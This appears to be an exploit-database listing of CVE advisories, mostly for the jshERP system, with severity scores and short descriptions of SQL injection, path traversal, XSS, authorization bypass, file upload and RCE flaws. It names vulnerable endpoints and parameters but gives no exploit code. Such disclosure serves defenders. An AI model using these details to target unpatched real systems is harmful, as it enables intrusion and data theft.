Exploit Database

145,303 exploits tracked across all sources.

Sort: Activity Stars
CVE-2025-55315 WRITEUP CRITICAL
ASP.NET Core 2.3.0-2.3.5 - HTTP Request Smuggling via Inconsistent Request Interpretation
Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
CVSS 9.9
CVE-2026-1588 WRITEUP LOW
jishenghua jshERP < 3.6 - Path Traversal via DefaultPluginOperator install Function
A vulnerability was found in jishenghua jshERP up to 3.6. The impacted element is the function install of the file /jshERP-boot/plugin/installByPath of the component com.gitee.starblues.integration.operator.DefaultPluginOperator. The manipulation of the argument path results in path traversal. It is possible to launch the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.
CVSS 2.7
CVE-2026-1549 WRITEUP MEDIUM
jishenghua jshERP < 3.6 - Path Traversal via PluginController configFile Parameter
A vulnerability was identified in jishenghua jshERP up to 3.6. Affected by this vulnerability is an unknown functionality of the file /jshERP-boot/plugin/uploadPluginConfigFile of the component PluginController. Such manipulation of the argument configFile leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.
CVSS 4.3
CVE-2026-1549 WRITEUP MEDIUM
jishenghua jshERP < 3.6 - Path Traversal via PluginController configFile Parameter
A vulnerability was identified in jishenghua jshERP up to 3.6. Affected by this vulnerability is an unknown functionality of the file /jshERP-boot/plugin/uploadPluginConfigFile of the component PluginController. Such manipulation of the argument configFile leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.
CVSS 4.3
CVE-2026-1546 WRITEUP MEDIUM
jishenghua jshERP < 3.6 - SQL Injection via getBillItemByParam barCodes Argument
A security vulnerability has been detected in jishenghua jshERP up to 3.6. The impacted element is the function getBillItemByParam of the file /jshERP-boot/depotItem/importItemExcel of the component com.jsh.erp.datasource.mappers.DepotItemMapperEx. The manipulation of the argument barCodes leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.
CVSS 6.3
CVE-2026-1546 WRITEUP MEDIUM
jishenghua jshERP < 3.6 - SQL Injection via getBillItemByParam barCodes Argument
A security vulnerability has been detected in jishenghua jshERP up to 3.6. The impacted element is the function getBillItemByParam of the file /jshERP-boot/depotItem/importItemExcel of the component com.jsh.erp.datasource.mappers.DepotItemMapperEx. The manipulation of the argument barCodes leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.
CVSS 6.3
CVE-2025-8840 WRITEUP MEDIUM
jshERP <= 3.5 - Improper Authorization via /jshERP-boot/user/deleteBatch Endpoint
A vulnerability was determined in jshERP up to 3.5. Affected is an unknown function of the file /jshERP-boot/user/deleteBatch of the component Endpoint. The manipulation of the argument ids leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Different than CVE-2025-7947.
CVSS 5.4
CVE-2025-8839 WRITEUP MEDIUM
jshERP <= 3.5 - Improper Authorization via User Addition Endpoint
A vulnerability was found in jshERP up to 3.5. This issue affects some unknown processing of the file /jshERP-boot/user/addUser of the component Endpoint. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
CVSS 6.3
CVE-2025-7948 WRITEUP MEDIUM
jshERP <3.5 - Weak Password Recovery
A vulnerability classified as problematic was found in jshERP up to 3.5. Affected by this vulnerability is an unknown functionality of the file /jshERP-boot/user/updatePwd. The manipulation leads to weak password recovery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
CVSS 4.3
CVE-2025-7947 WRITEUP MEDIUM
jshERP < 3.5 - Improper Authorization via Account Handler ID Parameter
A vulnerability classified as critical has been found in jshERP up to 3.5. Affected is an unknown function of the file /user/delete of the component Account Handler. The manipulation of the argument ID leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
CVSS 5.4
CVE-2025-67344 WRITEUP MEDIUM
jshERP < 3.5 - Stored Cross-Site Scripting via /msg/add Endpoint
jshERP v3.5 and earlier is affected by a stored Cross Site Scripting (XSS) vulnerability via the /msg/add endpoint.
CVSS 4.6
CVE-2025-67341 WRITEUP MEDIUM
jshERP <= 3.5 - Stored Cross-Site Scripting via PDF File Upload
jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users.
CVSS 4.6
CVE-2025-60801 WRITEUP HIGH
jshERP < 2025-08-14 - Unauthenticated Remote Code Execution via jsh_erp Function
jshERP up to commit fbda24da was discovered to contain an unauthenticated remote code execution (RCE) vulnerability via the jsh_erp function.
CVSS 8.2
CVE-2025-60800 WRITEUP HIGH
jshERP <commit 90c411a - Info Disclosure
Incorrect access control in the /jshERP-boot/user/info interface of jshERP up to commit 90c411a allows attackers to access sensitive information via a crafted GET request.
CVSS 7.5
CVE-2025-55371 WRITEUP MEDIUM
jshERP 3.5 - Unauthenticated Information Disclosure via PersonController getAllList Method
Incorrect access control in the component /controller/PersonController.java of jshERP v3.5 allows unauthorized attackers to obtain all the information of the handler by executing the getAllList method.
CVSS 5.3
CVE-2025-55370 WRITEUP HIGH
jshERP 3.5 - Authorization Bypass via ResourceController ID Parameter
Incorrect access control in the component \controller\ResourceController.java of jshERP v3.5 allows unauthorized attackers to obtain all the corresponding ID data by modifying the ID value.
CVSS 8.8
CVE-2025-55368 WRITEUP HIGH
jshERP 3.5 - Unauthenticated Arbitrary Supplier Status Modification via RoleController
Incorrect access control in the component \controller\RoleController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account.
CVSS 8.8
CVE-2025-55367 WRITEUP MEDIUM
jshERP 3.5 - Unauthenticated Arbitrary Supplier Status Modification via SupplierController
Incorrect access control in the component \controller\SupplierController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account.
CVSS 5.3
CVE-2025-55366 WRITEUP MEDIUM
jshERP 3.5 - Improper Access Control in UserController
Incorrect access control in the component \controller\UserController.java of jshERP v3.5 allows attackers to arbitrarily reset user account passwords and execute a horizontal privilege escalation attack.
CVSS 5.3
CVE-2024-24004 WRITEUP CRITICAL
jshERP 3.3 - SQL Injection via DepotHeadController Column and Order Parameters
jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutDetail() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.
CVSS 9.8
CVE-2024-24003 WRITEUP CRITICAL
jshERP v3.3 - SQL Injection via DepotHeadController Column and Order Parameters
jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutMaterialCount() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.
CVSS 9.8
CVE-2024-24002 WRITEUP CRITICAL
jshERP 3.3 - SQL Injection via MaterialController Column and Order Parameters
jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.MaterialController: com.jsh.erp.utils.BaseResponseInfo getListWithStock() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.
CVSS 9.8
CVE-2024-24001 WRITEUP CRITICAL
jshERP 3.3 - SQL Injection via DepotHeadController findallocationDetail Function
jshERP v3.3 is vulnerable to SQL Injection. via the com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findallocationDetail() function of jshERP which allows an attacker to construct malicious payload to bypass jshERP's protection mechanism.
CVSS 9.8
CVE-2024-24000 WRITEUP CRITICAL
jshERP 3.3 - Arbitrary File Upload via systemConfig/upload Interface
jshERP v3.3 is vulnerable to Arbitrary File Upload. The jshERP-boot/systemConfig/upload interface does not check the uploaded file type, and the biz parameter can be spliced into the upload path, resulting in arbitrary file uploads with controllable paths.
CVSS 9.8
CVE-2023-48894 WRITEUP MEDIUM
jshERP 3.3 - Incorrect Access Control via doFilter Function
Incorrect Access Control vulnerability in jshERP V3.3 allows attackers to obtain sensitive information via the doFilter function.
CVSS 6.5